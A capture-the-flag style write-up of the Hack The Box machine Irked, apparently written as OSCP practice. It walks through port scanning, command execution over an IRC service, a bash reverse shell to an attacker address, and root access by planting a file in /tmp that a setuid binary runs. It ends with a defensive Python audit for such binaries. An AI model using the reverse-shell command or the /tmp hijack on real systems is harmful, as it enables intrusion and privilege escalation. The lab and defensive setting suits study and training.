OSCP PREPARATIONS – HTB Irked

Irked is a Linux machine among the retired machines.
We start by scanning the target.


classic scan

TCP Port Full scan

UDP Full Scan

Here are the open ports, in order:
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
34900/tcp open unknown
65534/tcp open unknown
Among these ports, what draws our attention is port 6697, which does not show up in the classic scan and only appears in the full port scan. To see the details of the service running on this port:

The IRC protocol is running on this port. We keep this as additional information for now.
HTTP runs on port 80; we access the service via a browser.

We perform a directory scan with gobuster.

We were unable to find any significant information in directory discovery.
One thing about IRC on the web service draws our attention.
That's why we focus on port 6697, where IRC runs.

Let's connect to IRC with ncat:
nc 10.10.10.117 8067
We got a hostname error while connecting. We edit the /etc/hosts file and reconnect.

(received error)

Hostname added
Reconnecting

After the connection is established, we send a ping command to test whether the commands we send are executed.

As you can see, the command works.

We can get a reverse shell back to our own machine this way.
For a bash reverse shell we will use the following command, with ncat listening in the background:
bash -c "bash -i >& /dev/tcp/10.10.14.3/1234 0>&1"

We got our reverse shell.
We couldn't get the user flag; we constantly got a Permission denied error.

We perform enumeration to escalate privileges on the machine.

We could not obtain information in the enumeration part; I got help here. We are expected to download the jpg file and extract the data in it with steganographic methods.

With the obtained password, we make an SSH connection as djmardov.

In this way, we were able to obtain the user flag.
We tried to go to the root folder, but we got a permission denied error; privilege escalation is expected of us here.

We perform enumeration again to escalate privileges. I used the LinEnum.sh tool because manual enumeration takes a long time.

When the output is inspected, the viewuser SUID file stands out because of its time difference.

Viewuser executed

Here it says /tmp/listusers was not found; there is no such file, so apparently we will try to add a file here.
We created it; this time we got a permission denied error.

Let's give execute permission to this file.

After the permission is set, viewuser can be run.

We saw that it returns the id value.
Next, we have it give us a shell with the sh command.

As you can see, we got root permission 😊
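
From the defender's side, the weakness used above is a setuid binary that runs a file from /tmp, a directory any local user can write to. The following audit is an added example, not part of the original write-up: it walks a directory tree and reports setuid files whose embedded strings point into world-writable directories. The function names, the default root /usr and the directory list are assumptions made for this example.

```python
import os
import re
import stat
import sys

# Assumed list of directories that any local user can write to; a privileged
# program should never execute or trust files that live in them.
WORLD_WRITABLE = (b"/tmp/", b"/var/tmp/", b"/dev/shm/")

# Absolute-path-like runs of printable ASCII, similar to what strings(1) shows.
# The lookbehind keeps "data/tmp/x" from being read as "/tmp/x".
PATH_RE = re.compile(rb"(?<![\x21-\x7e])/[\x21-\x7e]{3,}")


def writable_dir_refs(data):
    """Return the sorted paths embedded in `data` that sit in a world-writable dir."""
    hits = {m.group().decode("ascii") for m in PATH_RE.finditer(data)
            if m.group().startswith(WORLD_WRITABLE)}
    return sorted(hits)


def audit_suid(root):
    """Walk `root` and return {path: [refs]} for setuid files with such references."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID):
                    continue
                with open(path, "rb") as fh:
                    refs = writable_dir_refs(fh.read())
            except OSError:
                continue  # unreadable or vanished file: skip it
            if refs:
                findings[path] = refs
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr"  # assumed default
    for path, refs in sorted(audit_suid(root).items()):
        print(path, "->", ", ".join(refs))
```

A hit is a lead for review rather than proof: the fix for a binary like viewuser is to drop the setuid bit or to stop it from executing anything outside root-owned, non-writable paths.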